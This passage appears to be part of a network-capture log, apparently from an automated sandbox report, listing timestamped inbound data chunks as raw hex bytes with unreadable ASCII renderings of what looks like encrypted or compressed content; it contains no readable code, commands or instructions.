                                                                        2021-10-14 08:47:23 UTC146INData Raw: b2 42 50 be b1 9b a0 5a 93 9b 0b 05 6c 33 9b d3 ba 09 42 ca 1a 2e 43 5d 74 09 fc d2 43 85 17 32 32 5c 5f 41 60 b2 3b 2f 4f 27 53 cd eb da 71 e0 90 17 d9 7d 06 ac cc b5 18 04 2c 59 04 1b ef 40 1d 7a ac 27 5c 94 13 da 26 cd 4b 9e d1 e1 98 3a 1c c2 43 c6 98 0b a4 39 df ee fa 71 29 e7 98 5c a1 81 3a b8 27 60 74 3f e3 74 f5 c3 43 71 9c 90 1b b2 19 c4 51 2d eb 80 14 c3 bd 53 a4 4e 64 6c ff e1 35 62 99 c2 73 89 ec 38 20 a1 05 82 85 6c 7e d2 a3 06 8a c7 9f e1 26 1c 37 20 f4 d5 5e 89 64 a5 04 b9 b2 f3 de 91 a0 b8 68 06 cd a2 ca 34 fb f7 f0 03 6a 7c 0d 44 1e 0a 5e 7a 77 49 2b 42 3d d7 32 2a aa c6 bb 33 78 0d 0c ed 7e 82 75 83 52 15 18 05 2d db 3f 00 83 dc b3 23 7b 74 91 4b 7d d7 55 03 01 78 49 a3 ea a4 f3 03 64 23 2d bf 3c 62 d6 0c 1e 74 cd 07 4c 77 bb e5 ba cb ab
                                                                        Data Ascii: BPZl3B.C]tC22\_A`;/O'Sq},Y@z'\&K:C9q)\:'`t?tCqQ-SNdl5bs8 l~&7 ^dh4j|D^zwI+B=2*3x~uR-?#{tK}UxId#-<btLw
                                                                        2021-10-14 08:47:23 UTC147INData Raw: 44 53 52 e8 b4 1f fb fa 38 11 0a 10 9b 2d 3f 37 01 74 90 e7 05 92 81 30 ef ef 43 f4 78 3b 99 e4 08 48 c7 fe 8d bf 09 39 50 ca 1d db 6b dd 27 00 c2 0f 1a 0c 01 10 0d fa c9 d8 8c bb f1 15 37 3c 33 4d c0 3f 48 18 45 24 c7 90 e0 1d 78 6f 42 6a f6 9c 90 37 8f 32 c2 50 13 ed 37 53 e7 05 e8 8b 2f ab 49 0d f4 89 ac a2 92 1a 9a 37 bf 9d 30 c8 f4 6d 89 f9 6c f3 e9 e3 74 9e 6b 06 51 71 a9 8c 43 2f 5b 80 62 77 fa 73 66 f3 6f ca 8b ab 7a 6a ab ea ec 39 0c 19 f9 2d e0 96 13 a2 f6 bb c9 01 db d2 38 e9 5c 73 a8 75 65 05 9f a8 cb e8 3c 38 b5 dd 09 97 37 c3 2b ab 3f 87 87 b9 e1 5d 4d e1 7a c0 5b 12 f8 d9 e3 ab 6f 3e ca 97 52 80 cb 83 30 c0 dd 12 3b 05 19 28 14 73 a3 fc d2 18 14 a5 9c 44 e3 70 0d cc 0c 47 21 65 e8 8a ed a3 6b b4 72 d1 b6 cb 2e c5 96 0e f2 19 6e 72 f0 2b fa
                                                                        Data Ascii: DSR8-?7t0Cx;H9Pk'7<3M?HE$xoBj72P7S/I70mltkQqC/[bwsfozj9-8\sue<87+?]Mz[o>R0;(sDpG!ekr.nr+
                                                                        2021-10-14 08:47:23 UTC148INData Raw: e1 ba 13 98 4c 4b f4 85 8f 44 37 26 ae 99 69 fb a3 bb b6 65 96 cf a4 e0 92 30 48 f1 03 76 74 fc 44 1e 0c ee dd 24 c2 0c 62 e5 f5 a1 28 8a e7 0a 16 55 03 0e e5 c0 82 75 85 58 24 40 9c 2c cc 13 0d 5c de b5 09 63 2f 25 58 5b f3 a8 95 03 78 69 7c e4 89 e2 3a 4d 9f 02 bd 3c 44 44 ac 60 ed d4 2f 65 55 65 e1 90 49 4f 2c 76 6e 5e 98 d7 c2 4c 3e 55 70 bb e4 89 33 61 7a 98 5c 5f 38 ed 18 ca 17 e3 3e 87 a8 f0 95 d4 dd f8 b2 e7 d5 77 7e 26 8c 2d 7c b2 ed 19 17 77 34 77 e6 b1 6a 3e e3 25 8a f8 68 48 c4 96 a7 07 4c 58 95 08 43 3b 46 ef 88 e5 b7 d8 89 3d 36 6a 18 f5 b2 c0 44 c5 08 ee 60 fc 65 27 5e 65 d2 0b de 7f f5 ff c3 b0 bf 17 3f 8c 9d f5 7b d7 3d d6 f4 ad 7d d5 63 24 bc 8c ea 74 be dc 9d 1f c7 90 9d 06 e5 e5 b0 ea b4 a2 a8 87 21 6b 1b 18 9d a0 01 58 2a 68 b2 3e b7
                                                                        Data Ascii: LKD7&ie0HvtD$b(UuX$@,\c/%X[xi|:M<DD`/eUeIO,vn^L>Up3az\_8>w~&-|w4wj>%hHLXC;F=6jD`e'^e?{=}c$t!kX*h>
                                                                        2021-10-14 08:47:23 UTC150INData Raw: 2d e0 96 13 19 f7 bb c9 01 db d2 3b e9 5c c8 a9 75 65 05 73 a2 cb e8 3d 1c b0 f2 0b 91 1b 6f d3 4c a7 86 83 9d c2 e4 4f e1 e0 7f 53 2d cc df c0 12 6d 3e ea 96 7e a8 cb 9c 3e e1 d8 3d 39 03 35 84 ec 94 3b fd d6 3c 30 1d 9e 44 79 cf 05 f3 38 41 05 dd ea 8a cd b1 4c 9c 72 ce b8 ec 2b ea 94 08 de b5 96 95 68 2a fe f7 25 39 e6 d8 7d 4e e9 13 a3 c5 a0 67 23 29 f9 d5 c7 98 eb 46 c0 a1 af b1 d6 88 99 8e 52 32 5e 19 3b dd e0 5e 91 85 15 b0 79 53 c7 77 5b 38 fe af b8 88 1c 71 7b b1 a1 62 8e 47 b2 56 32 0d 8c f2 61 40 ab 0f 2f e9 14 31 7b c1 f4 1f 01 e1 98 53 76 9e 1c f8 8d 5a b3 03 05 28 6e 2c 8b d1 15 75 db cd 30 ac 1d cc 76 09 f8 68 e8 aa 06 14 88 71 71 53 46 b2 dc 00 4f 27 6f 79 e0 d8 71 f9 af b9 8a e6 07 aa e2 17 6f 9e 2d 59 9a 1e 4d 50 3b 5a 3f 01 71 85 15 95
                                                                        Data Ascii: -;\ues=oLOS-m>~>=95;<0Dy8ALr+h*%9}Ng#)FR2^;^ySw[8q{bGV2a@/1{SvZ(n,u0vhqqSFO'oyqo-YMP;Z?q
                                                                        2021-10-14 08:47:23 UTC151INData Raw: b4 9b b5 73 76 90 d8 52 e2 e0 15 63 8c 60 31 45 6f c7 9a 1e 1a aa 9d de 00 3e 8c 0d 4f 1f 88 c8 d8 84 77 2e 50 f4 7d 9c 6e fa 73 46 be 74 c3 6d 90 70 0f 77 60 2c 86 2d 9b 8f 23 05 be c5 6c 8c 59 35 3b da 6c c0 b7 24 10 12 34 e3 bb 51 60 1d d2 d7 0e 92 4a e3 87 df 57 e4 cf 25 1d 76 a9 cc a0 54 3e ec 1f bd 34 b7 db 35 75 6f 56 ba 1f 87 70 73 82 c9 42 c3 d5 fc fc 23 05 3a 91 35 26 e3 16 7f 3a f7 0d ab c7 a5 de c2 36 87 b8 60 d6 40 90 f6 cd 78 89 73 9b d4 84 a1 c9 85 ef 2c 95 51 40 f6 d7 6b 6e 2c 00 0f 57 2a ed d4 f1 43 db 20 79 ff 48 ca 64 23 dd 66 2d 17 20 98 12 98 9b 38 24 37 7a e8 32 14 c3 69 dd a0 3f cf 69 ee a6 60 0d 11 04 d6 aa 4c 07 79 81 14 21 64 bc f3 a6 ba 1c ed 36 fa 23 f1 f1 92 ff 16 c8 d9 da d1 ae 28 1a 60 ce 32 cd c9 f5 fa 0c 33 c4 bf cc 6e f2
                                                                        Data Ascii: svRc`1Eo>Ow.P}nsFtmpw`,-#lY5;l$4Q`JW%vT>45uoVpsB#:5&:6`@xs,Q@kn,W*C yHd#f- 8$7z2i?i`Ly!d6#(`23n
                                                                        2021-10-14 08:47:23 UTC152INData Raw: 59 1f 30 73 8c c6 d1 0e 07 e4 14 e4 11 ce 88 0c 71 ff d8 ee 21 b2 b6 72 b9 8e 46 64 56 9d a4 40 0f c5 ff 2c 90 25 0d d5 00 b2 8b 83 cf 98 29 7c 14 9d 07 95 7d c7 47 bb 2e 41 b8 a1 8c c8 54 79 a0 7e 3b 05 0a db ed 66 03 4f 13 2e c7 cb 67 e8 91 2a de 21 7d c6 9a 56 0b fd 4a 60 20 6a 07 36 6a 08 43 6b 0d a6 0b a4 c5 a2 35 e4 82 20 dc 44 67 ae 3b a0 a7 30 80 46 64 8e 64 61 27 e3 b3 ce fd b4 21 2a 09 43 74 14 db a3 c4 c0 43 4c 31 a2 0e b3 22 c8 5a 5c f5 9e 2d 0c ec e8 97 68 47 79 43 c2 0e 4a 3a d0 74 a8 e5 05 97 93 36 ba 9d e9 6d e2 7a 94 69 2c 5e 1a ef f8 55 8d be 44 cc 18 d7 fe d3 65 67 b1 2c 6f 23 57 99 44 16 7d 1a c2 9f 17 54 eb 95 b0 dd a8 e0 e0 9e 16 e6 23 cb f1 8e 46 7b d4 5f 3e d6 e5 e7 e2 d7 33 14 7c 82 73 83 18 be 9e a2 1f a3 ad 03 54 79 a3 7d 8e 80
                                                                        Data Ascii: Y0sq!rFdV@,%)|}G.ATy~;fO.g*!}VJ` j6jCk5 Dg;0Fdda'!*CtCL1"Z\-hGyCJ:t6mzi,^UDeg,o#WD}T#F{_>3|sTy}
                                                                        2021-10-14 08:47:23 UTC153INData Raw: 61 62 3a 2c 71 10 99 3c cb f7 0a 38 97 8d 9d 9d b1 cd d0 36 4c 3d 92 79 d6 9a 8b 22 a3 37 0d ba 07 12 3f 68 8e 1c fe f2 21 7e 7c 1f 95 30 15 f1 05 e6 de e8 1e e5 6d 6b af e4 ef bc 32 4d c5 eb d2 28 a9 92 df 5d 0a 1d 64 e6 4d 8c 47 f2 1d 0b 27 2a a6 63 2d 2a 5d 34 b1 b9 d8 76 da 3e 26 01 5f f5 cf 30 47 2b ff 46 80 c5 b3 2c 4c 22 0a 31 9e 1c da e5 83 7f 9f 61 bf f4 09 26 09 0f e4 b8 31 e6 df 23 d8 a7 b8 3c d3 7c f0 43 8c 8d 75 a3 8a 08 8a 6e 7b 46 82 9b 42 84 17 db c7 e4 fb 69 ac e7 ff 60 15 b8 33 a6 df 99 d1 41 03 6e 8d ce 23 75 66 db 7c e7 e6 e6 68 08 df ff 12 46 79 28 14 1d c6 38 dc 28 43 9e 8e d2 cd 36 70 41 8d c9 60 5b af 26 9f 03 7d 73 03 6e 51 79 4f 61 cf 7a a8 8b fa b3 64 6a 05 95 e6 b7 5f 3e 96 73 16 4c e3 56 66 fa ff d6 d7 8e 20 c9 c2 4b 26 fa 9c
                                                                        Data Ascii: ab:,q<86L=y"7?h!~|0mk2M(]dMG'*c-*]4v>&_0G+F,L"1a&1#<|Cun{FBi`3An#uf|hFy(8(C6pA`[&}snQyOazdj_>sLVf K&
                                                                        2021-10-14 08:47:23 UTC155INData Raw: 01 9f 0a 8a 8e e9 3c 03 0f 20 a0 7a 62 71 b5 18 c8 8a 00 ef f5 5f ce e3 94 11 85 f4 7e f8 b9 d3 f7 2f 1e 96 78 4e e5 78 a3 15 71 60 df d2 1a 90 cc e8 c8 3c eb bf d2 f5 4c 32 b7 82 4f 2f 2d 50 3b 65 46 5b f1 14 df 19 69 3b fa a5 24 ae fc 05 1a 42 09 3c d0 c8 ab 79 9a 7d f0 09 14 28 db 3c 35 9b f1 97 2f c3 09 26 6c 5f e3 7b be 2c 51 7c 4f cc e2 f8 4b 28 d9 44 ce 51 26 09 4b 62 16 b6 38 72 f2 28 09 7b d2 57 96 c0 ef e9 5c 90 50 de dc e2 c1 1e 0b 59 fc b1 81 7f 9f cc dd 13 4b 76 48 32 94 46 6f d2 7c 68 12 ac 51 7c 73 e9 e1 53 32 9f a7 31 01 9f cb d9 87 c8 1d 3d c9 9a 5e ae a8 2b 23 9a 14 3f 2d 3b e0 80 42 26 ef 99 d6 41 3b 93 6f 74 14 86 80 ee 85 7b 2c 48 f3 6b 98 39 d1 51 4c f6 6a c3 68 a9 53 3f 04 09 37 ae 6e ce ad 5f 4a 8c 97 3a d7 04 68 1e 99 40 81 e9 01
                                                                        Data Ascii: < zbq_~/xNxq`<L2O/-P;eF[i;$B<y}(<5/&l_{,Q|OK(DQ&Kb8r({W\PYKvH2Fo|hQ|sS21=^+#?-;B&A;ot{,Hk9QLjhS?7n_J:h@
                                                                        2021-10-14 08:47:23 UTC156INData Raw: be 38 f8 8f 52 09 2b 68 db 3a 58 1d c7 bd 5b b7 0d 24 6b 38 af f8 c0 21 22 de 84 a1 79 fc 1f 16 5c 98 bd 08 50 a4 80 a4 bf c6 ac 1d 88 49 8a 98 32 21 05 68 8c c1 eb 2a 34 c5 a2 2b ae 65 ed e2 84 e2 a8 db 91 9e bc 65 be 26 4c 46 12 d7 c5 e5 33 47 0f a7 9e 7c 87 d0 84 06 f2 d9 14 4d 36 21 37 a3 03 0a c1 e2 3d 10 38 a8 9e 29 31 f2 24 d4 b4 9c 11 28 59 38 40 b4 67 a7 0a 61 0f cf 3e 59 d3 3a e4 04 cf b9 f0 39 5e bd 9e 46 79 03 84 38 f9 6d 15 79 94 c3 dc 2d 62 07 70 11 b2 33 48 6d 4d 20 78 46 aa e2 4f a7 f8 c4 73 7e 88 50 45 4b 50 cc d0 67 e8 d1 bc 6a 3f 18 52 95 f9 e3 23 22 c6 36 c5 20 d3 8c 44 2d b1 be a3 38 86 82 47 b4 88 42 52 68 ad 95 6a 2c e4 ec 37 82 33 0f e1 1e a0 94 b3 cd 99 2f 5e 21 bc f4 89 6e ee 60 b6 2a 44 a6 a3 99 c8 44 70 fc 29 38 1b 18 d8 ef 68
                                                                        Data Ascii: 8R+h:X[$k8!"y\PI2!h*4+ee&LF3G|M6!7=8)1$(Y8@ga>Y:9^Fy8my-bp3HmM xFOs~PEKPgj?R#"6 D-8GBRhj,73/^!n`*DDp)8h
                                                                        2021-10-14 08:47:23 UTC157INData Raw: 0f 24 dc 32 28 55 bd bf 94 bc 80 4c e0 ea 4e ef b2 ac 36 ac cb ca 58 58 fb bf 1c 72 93 a7 20 36 47 1e 5e f6 88 78 25 f4 07 51 c6 ac 09 e9 a2 91 e5 54 60 b7 ae 4a 2b 47 d4 90 2e 95 f3 e8 18 76 6b 33 ca 95 e0 69 ea 06 df 5a f6 c4 4f c2 62 d9 18 c7 5d 39 39 1e a4 07 b8 b0 54 58 d5 ae 1e e8 3b 51 59 b5 31 94 cb 42 7e 3e e6 48 29 c0 b9 8c 46 5c d4 64 a1 43 09 57 88 50 49 c0 be cd 13 6a 40 ba de 06 8b 4a d3 43 6c 86 f2 ff ce 52 a6 19 f1 eb 2c 69 aa 0d 28 14 1d ae f3 fb 61 d2 cf 67 9a 9a fe 40 f1 43 61 40 2e 0f 9e 4f 1b c7 1d c1 06 3c 4a f4 27 f7 10 5a 5c 1b 43 39 46 cb 7e f6 e0 50 50 d0 c6 91 f4 ee df 8a 50 66 00 af 59 a2 e3 42 1b 8a 15 79 87 2d 2b 0f 4b e7 7b e7 88 77 64 4f 47 c4 76 65 dd 10 b0 c8 b1 5b ec 62 47 aa be 8d af 3b 66 d3 a9 c0 3f ba 88 c1 13 73 5c
                                                                        Data Ascii: $2(ULN6XXr 6G^x%QT`J+G.vk3iZOb]99TX;QY1B~>H)F\dCWPIj@JClR,i(ag@Ca@.O<J'Z\C9F~PPPfYBy-+K{wdOGve[bG;f?s\
                                                                        2021-10-14 08:47:23 UTC159INData Raw: e5 db db 9e f9 4e cc 9c a9 a3 d8 99 a4 1e 39 9c 68 21 14 d1 d5 79 b5 a0 be ae 4a 55 fc 4d 56 26 ee b1 b5 ff 05 47 5c 9b 8f 53 b8 7b 98 66 20 bf d6 6a 74 7c 87 13 1f d4 2c 34 39 2a 07 ce ec 19 76 85 b1 5e e9 4c 67 9f 7b dd df f5 91 cc 6c 07 7e e4 a2 3a ce 4d d4 26 92 f9 20 25 16 61 ff c9 53 95 82 b5 9a 52 56 d8 a4 c4 86 b2 09 05 80 18 74 c3 0f 80 ca 6d 43 8e c3 4e a8 ca 85 b3 e7 c1 a1 f6 a0 89 cd 37 a7 72 3f 4b d6 00 55 f5 2d a4 89 44 c5 44 3c 93 26 90 dc 04 c5 e8 95 45 04 66 33 1c 8a 8e a5 fe c2 b3 27 67 44 74 fe fb ac 2f a8 17 be 5e c5 92 61 3c 8b fd 85 bd d1 31 27 11 36 bb 76 2d 70 b2 17 cd 8b 61 db ea 52 dc e9 86 09 cf d7 4b fe be d8 f6 3c 7b 87 63 4c 81 16 ed 30 57 65 d3 de 34 90 da dc f7 0e d3 96 d8 b7 64 27 a2 96 63 3e 04 55 32 65 6c 70 e7 4f cb 21
                                                                        Data Ascii: N9h!yJUMV&G\S{f jt|,49*v^Lg{l~:M& %aSRVtmCN7r?KU-DD<&Ef3'gDt/^a<1'6v-paRK<{cL0We4d'c>U2elpO!
                                                                        2021-10-14 08:47:23 UTC160INData Raw: 91 bd 53 68 49 c8 53 42 f8 0e 1b 47 ff 5d b8 f0 e1 82 91 0c fa a4 6b fd 5f af 90 ea 4b 9e 6b ab f4 e1 41 25 5a 38 a2 0b b4 90 30 58 a7 b8 f1 cd d2 e2 a6 04 31 5f e6 0b e1 a3 10 f7 6f f9 9d 6f da d9 d1 90 35 bc 57 1a d8 c7 d6 e6 74 d8 f7 10 c1 4a 23 52 b3 14 83 8f 23 00 22 34 a4 cf 4c 73 60 b1 59 70 37 e6 a5 a2 9c 7f b4 76 ec 4f b4 f1 c5 e6 0b 97 80 d3 ef d7 5e 46 0a ec 18 ba a4 9f 8e 60 6f ca bc de 19 b8 79 34 55 91 ab 90 e0 ca 6c be 0a 49 79 8f 79 db 19 0c b6 e1 cb 90 61 27 fd 1c a6 4b ab d3 c7 1b b9 1a db 64 f8 e2 5e 9f a4 6e e1 2d 46 62 f6 f1 3f a3 cc 58 41 62 59 f8 33 73 12 cf 8d 17 91 05 29 7b 2b a0 e5 9a 2c 2d c1 cd d0 49 a3 4e 3c 02 cd cc 10 3a a0 9b ec c9 db de 06 95 21 e2 86 59 4d 0d 4e c4 ee e7 21 20 ae fc 05 84 60 d9 bd ce bf 83 ba a8 e4 d8 70
                                                                        Data Ascii: ShISBG]k_KkA%Z80X1_oo5WtJ#R#"4Ls`Yp7vO^F`oy4UlIyya'Kd^n-Fb?XAbY3s){+,-IN<:!YMN! `p
                                                                        2021-10-14 08:47:23 UTC161INData Raw: 38 6f b0 5b 61 1c d4 9f ec 93 59 d2 e5 c5 85 a3 d2 1b 34 35 17 8b 98 e7 5b ee 4d d4 35 a7 fd 31 5e ce 92 13 3b 70 9c a5 9d a8 1a 89 8f ba 0d e2 77 73 ab 1f 17 e7 34 41 71 e9 7f 09 be 16 16 63 1c 88 89 45 ff 9f 75 f1 29 e6 e8 88 33 38 e2 43 39 32 31 cc 19 5a 37 17 b9 c5 58 7f 9a e5 c9 ba c9 ac 98 d0 61 96 15 ef e9 8e 5c 19 85 21 67 8f a8 fc 8d 8c 7f 45 27 de 09 c2 15 87 b8 86 23 fa 95 6b 3f 57 ec 1d f1 eb fa c9 98 73 8b 4c 64 55 38 83 9d f2 32 48 f2 3d af 2e 1e 67 25 43 2b dd 24 3e 3f ba e3 91 4f d4 0c 5b 40 42 f2 65 bc 28 57 14 59 e7 c4 cc 68 5d 66 80 74 74 16 ee b2 8b a3 d1 14 a5 b8 16 c9 a2 ba 1f d1 81 d9 5d 42 e5 8b 2f 70 d1 e6 7f 51 7e 2e 69 dd 91 75 67 f9 09 04 9e ae 55 c6 87 94 e2 13 78 b1 b2 40 30 6d a6 80 29 83 fa ab 3d 6b 63 7c d6 98 e5 59 d0 20
                                                                        Data Ascii: 8o[aY45[M51^;pws4AqcEu)38C921Z7Xa\!gE'#k?WsLdU82H=.g%C+$>?O[@Be(WYh]ftt]B/pQ~.iugUx@0m)=kc|Y
                                                                        2021-10-14 08:47:23 UTC162INData Raw: 34 8d b3 45 b0 21 34 16 7d 35 93 c9 af 27 7f ce 1d 8c 13 c4 59 21 db db fd ec 0c 0a 93 4f 59 62 6e bc c9 33 7e 1f 49 28 d4 ee b2 38 6c f5 39 bf df 69 30 d7 a9 52 ed 97 c3 eb a8 98 d1 aa e7 d3 80 59 ee 25 5a 12 94 4c 2b 91 1a f0 f7 3f 8a 11 78 f2 53 be 9c 63 86 9f c4 10 4b 39 5c 4b c7 d2 ee b5 ba eb 3a 19 22 38 be a1 aa 29 dd 16 8e 6a fc ec 44 04 b7 cc 64 49 25 d9 ff c4 e5 21 a2 f3 99 75 ed 08 59 86 32 3a 85 34 00 7d f6 72 0a ab 1c 46 2b 4b 8f 99 58 f8 ca 72 eb 23 f2 9a 96 07 03 d1 68 0c 02 20 eb 2d 6f 34 8f 51 00 91 b9 59 2c 18 76 0c 51 43 79 aa 5e 90 62 17 60 a3 fa 56 f5 98 7c 50 0b 59 5f 95 b7 d3 16 ef 0f d9 51 7e 48 ae 7b 05 f1 bc c0 7d 8a 60 60 35 15 b8 04 fe 76 01 3e 58 91 f9 99 57 44 b7 6d ec 76 00 6f 2a 1f 74 d5 2f 61 75 b7 e3 90 49 a3 3d 75 4c 56
                                                                        Data Ascii: 4E!4}5'Y!OYbn3~I(8l9i0RY%ZL+?xScK9\K:"8)jDdI%!uY2:4}rF+KXr#h -o4QY,vQCy^b`V|PY_Q~H{}``5v>XWDmvo*t/auI=uLV
                                                                        2021-10-14 08:47:23 UTC163INData Raw: b3 2c fd e5 52 33 07 21 9d 2b f5 af 5f de 97 e7 d9 90 91 28 e9 ef 1f d0 75 19 b9 c4 9d 6a 9d fa ab 61 fa 39 f5 c9 3f f6 98 fa ad 2d 4a 71 15 04 8d 13 27 4c 51 ec 19 07 c6 38 d7 04 e0 d1 d0 3f fc 1c 57 29 d5 90 76 1f 47 40 50 6c bf 29 1d 84 9c 32 3f 57 57 c5 31 53 7c 3f 60 83 0f 8b 5b 11 51 93 8a 46 e1 15 3f 32 a4 b5 9b d7 00 63 b1 7b 39 7a 1c eb 0b bc 69 19 51 71 35 a9 a6 2a 49 90 dc 75 17 52 66 2d 5e ca c4 84 94 6f af ea 65 03 2f 7d 76 2c 45 ba f5 33 e2 bb f8 90 38 d7 2c cf fa da 0f 6f 63 25 68 a1 6e f2 25 34 c8 e7 ae 8d 37 e9 28 d9 fb 9b 81 bd c5 f5 ea fb 71 58 87 22 ea ff 6c 13 68 1b ca b7 41 a8 20 96 db e1 e7 3f a3 18 eb 2a 80 0d 90 e0 26 34 26 1e ba 65 17 c2 3a e1 0d 71 f5 f6 e0 8a e2 ad ed 9b 78 d1 25 c8 8a ef 86 0e 62 1a 1c 24 77 2a 23 d1 00 09 f8
                                                                        Data Ascii: ,R3!+_(uja9?-Jq'LQ8?W)vG@Pl)2?WW1S|?`[QF?2c{9ziQq5*IuRf-^oe/}v,E38,oc%hn%47(qX"lhA ?*&4&e:qx%b$w*#
                                                                        2021-10-14 08:47:23 UTC164INData Raw: 5c 6d d4 5e 5c 52 37 06 a4 b2 af fb 3d b0 95 49 94 cf d0 cb 14 4e a0 f2 ce 72 da 21 4d 1f 0c 74 f4 0e d0 2a 33 3b 38 a1 a6 ab cd 20 16 55 d8 2b cd ed f1 77 52 72 2c 3f 07 2d cc 17 7c 82 dc b5 14 f9 dd 08 c4 7c d1 75 97 03 0a 48 39 cf 00 e1 f2 44 27 2e bd 3c 46 6e 26 19 74 d5 32 61 a2 bb 70 91 4b d5 09 5b 72 6f b8 09 dd 4c e9 75 a9 91 46 89 2c 6a 29 b6 5e 5f 3e c7 49 b4 10 e3 3c 83 88 2f af c3 dd 62 8a ca 10 51 c1 f8 8c 2d 7c 92 11 31 17 77 36 78 11 9c da 3f e0 0f 0c 86 49 5e c4 92 9a e7 ad 58 21 93 63 16 54 c9 47 06 b5 d8 94 1d b0 41 a1 f4 af cd 6c e8 b3 f7 66 d6 e2 5b 29 64 69 0e fc 9f f7 ff da 2e 9a 3a 2c a8 4f 14 c2 d6 3f f7 80 86 89 cf 7c 00 95 a3 1e 74 03 f7 1d 60 5e 91 de 06 c5 07 b3 e8 4e 38 36 ab 32 4d 3b fa 58 bf 01 78 af 43 b8 3f 14 86 76 13 08
                                                                        Data Ascii: \m^\R7=INr!Mt*3;8 U+wRr,?-||uH9D'.<Fn&t2apK[roLuF,j)^_>I</bQ-|1w6x?I^X!cTGAlf[)di.:,O?|t`^N862M;XxC?v
                                                                        2021-10-14 08:47:23 UTC166INData Raw: 05 df 64 d4 9a fe b8 01 10 61 cb aa 88 6f 28 68 8e cb be 2f a4 80 f1 0b bc 3c f9 af d4 a6 83 88 ae c3 e6 4f e8 50 4a 7c 3e ea 6e c5 84 70 3f ca 20 4f 30 d6 82 2f 19 e9 aa 24 04 1f aa b8 1d 38 fc d2 d3 1e 0e 9c 45 e3 5e 07 f1 1c 60 01 5d c9 9a ef 82 61 0b 7f c1 ab c5 06 1a 99 1e f6 32 e8 e5 60 3a f8 d6 20 00 cb d5 e5 6a c4 80 8d e8 a7 65 23 02 ed 85 e8 99 eb e4 da 84 80 b2 d6 aa ad 05 2e aa 5f 82 30 ee e4 5c 91 21 ae de 56 40 e1 41 41 2b fc ae 98 b9 3f 67 65 a8 a8 d8 a5 56 b0 06 98 fd f3 2b 7e 16 2f 23 2f aa 0a 67 61 20 d8 4e 39 97 1f 12 71 de 22 9f a6 c8 b5 0e 2f 53 ec 5e 8c bf 89 5d c2 c0 37 ec 23 c2 73 9b fe e1 cf d1 97 40 a9 31 6c 05 c6 9e b2 65 51 71 f3 95 cc 92 6f a9 05 7d f3 37 18 fc 66 c1 67 d5 33 5f 06 a9 66 51 1f 2c b6 70 70 c8 2b ac 29 c3 4c d3
                                                                        Data Ascii: dao(h/<OPJ|>np? O0/$8E^`]a2`: je#._0\!V@AA+?geV+~/#/ga N9q"/S^]7#s@1leQqo}7fg3_fQ,pp+)L
                                                                        2021-10-14 08:47:23 UTC167INData Raw: 8f 6a 3f e5 7d 0d b1 db 58 c4 e0 86 ac 4c 5e 93 00 60 05 56 9f 28 77 b4 cd a5 4b de 4d 1f e0 81 9a ec 2c 0b fb 4a 80 63 1b c0 71 fe 59 7e 68 f6 ea ef 7c 1a f9 2a bf 91 42 f9 bf 3f e3 ac d0 fd 24 75 15 b8 f7 68 eb ba e3 33 37 de b3 89 17 e9 51 32 23 b6 2d a1 fc b0 27 2f ef b3 f6 81 8b b0 56 9e 68 2f 49 61 07 24 36 7f 63 ec 1d 37 fe b8 ff ac b4 94 c2 fd 30 74 d3 6d 0b 46 26 28 56 e7 2f 5e 3a ca 80 82 73 4c da 46 b1 6e c7 21 2a 69 8f 4d ce 41 03 8d e1 bf a4 ef a3 6f 60 ca 83 ed 9b 31 37 74 6b 3e b8 fb 13 37 dc 3c 01 c6 54 e7 6c 03 fa 43 61 70 3f 93 db fa d7 37 3f 27 50 9c 19 17 b3 7f 1b 90 d5 03 b4 34 40 ee 91 c6 d7 55 58 be fd bf 4c c7 f2 aa 58 2c 3f 50 10 32 c4 6b db 21 58 41 e1 9e 0b 01 66 2c 7e c9 de 8c 2d d3 0a 24 1c 13 3f c3 0d 4a 3e a4 41 c0 a2 fb 33
                                                                        Data Ascii: j?}XL^`V(wKM,JcqY~h|*B?$uh37Q2#-'/Vh/Ia$6c70tmF&(V/^:sLFn!*iMAo`17tk>7<TlCap?7?'P4@UXLX,?P2k!XAf,~-$?J>A3
                                                                        2021-10-14 08:47:23 UTC168INData Raw: 31 71 fb ae bf 6a 50 47 7f 58 14 8f f2 6b 60 40 2f 2f 39 ca 66 30 30 ec d5 0e 27 c1 9f 50 f6 9e 2d b9 d2 5b 69 15 21 05 6c 2c 8d fb 17 0b 53 ec 42 a9 e2 cc 79 09 f8 f2 cd 87 97 32 b9 59 00 52 a3 9a b9 2d 4f 27 73 51 4d da 67 df f7 3e 1f 77 0a aa e6 37 66 9d ad 59 16 1b 12 43 e7 72 38 02 71 85 35 fa 29 cf 5d be 83 51 ba 33 0c d5 6b eb 9a 0b 22 13 4b b0 11 71 22 ea a8 cc a3 81 3a 22 82 4d 73 39 b1 e5 e7 ca 53 51 92 e8 1b b2 01 ec 6d 2f e7 81 99 49 d2 ca 01 11 60 4c 6e e3 24 62 cd f2 b8 9a db 18 e1 c3 05 82 a5 d8 49 d2 be 12 44 e8 8c e1 20 57 b5 5e 6d d4 4f 8d 95 21 80 b9 a3 69 67 de b1 9e 48 94 de a2 9b 17 27 d8 e1 03 56 37 20 46 1e 0c 65 f8 07 c7 43 4b 28 f7 7d 4b aa c6 21 16 44 1c 58 cc 6b 89 64 83 fa c9 3e 05 2d cc 06 2d f3 dd ec 0a e8 0a 2c 26 7d d3 75
                                                                        Data Ascii: 1qjPGXk`@//9f00'P-[i!l,SBy2YR-O'sQMg>w7fYCr8q5)]Q3k"Kq":"Ms9SQm/I`Ln$bID W^mO!igH'V7 FeCK(}K!DXkd>--,&}u
                                                                        2021-10-14 08:47:23 UTC169INData Raw: b3 f2 79 c3 61 54 bf da 48 6a eb 93 58 6d 1e ca ec 8b 58 db 63 7c e2 66 0f fd 03 f6 64 53 64 31 9f 18 a4 ea 10 39 23 8a 9b 2b 15 b5 7e ed e3 e6 7d bd 11 32 23 76 d9 d1 55 2a b9 c4 cf 4b d4 fe 88 61 7e a3 50 d3 35 f6 2d df 35 3e 53 71 a6 0d 01 14 2d 4c c8 d8 8a 39 ce 1d d7 18 36 fb c2 3f 48 38 a7 03 81 93 a5 3e fb 62 67 6c dc 1a ee ae 8d 32 80 73 f6 e4 26 5c 58 20 c5 99 09 8b fd 0f b2 8a ed 4d 0e 15 bf 28 b6 b5 1d ca f7 6b a5 63 08 4f 19 e1 55 be d3 04 51 71 30 a9 28 3d 21 ab 74 7a df 73 46 1e 48 ca 88 b5 14 44 fb e1 fb 1c af 67 60 2c e0 92 30 1b b2 b8 a8 90 45 f0 0f cf 7c ca aa 75 66 25 6c 97 d1 cd d2 36 b8 f0 0b 97 31 e9 ae d5 e0 85 db b6 03 e8 6a e1 7a 5a 7e 3f e9 ff 85 12 3f 35 05 b8 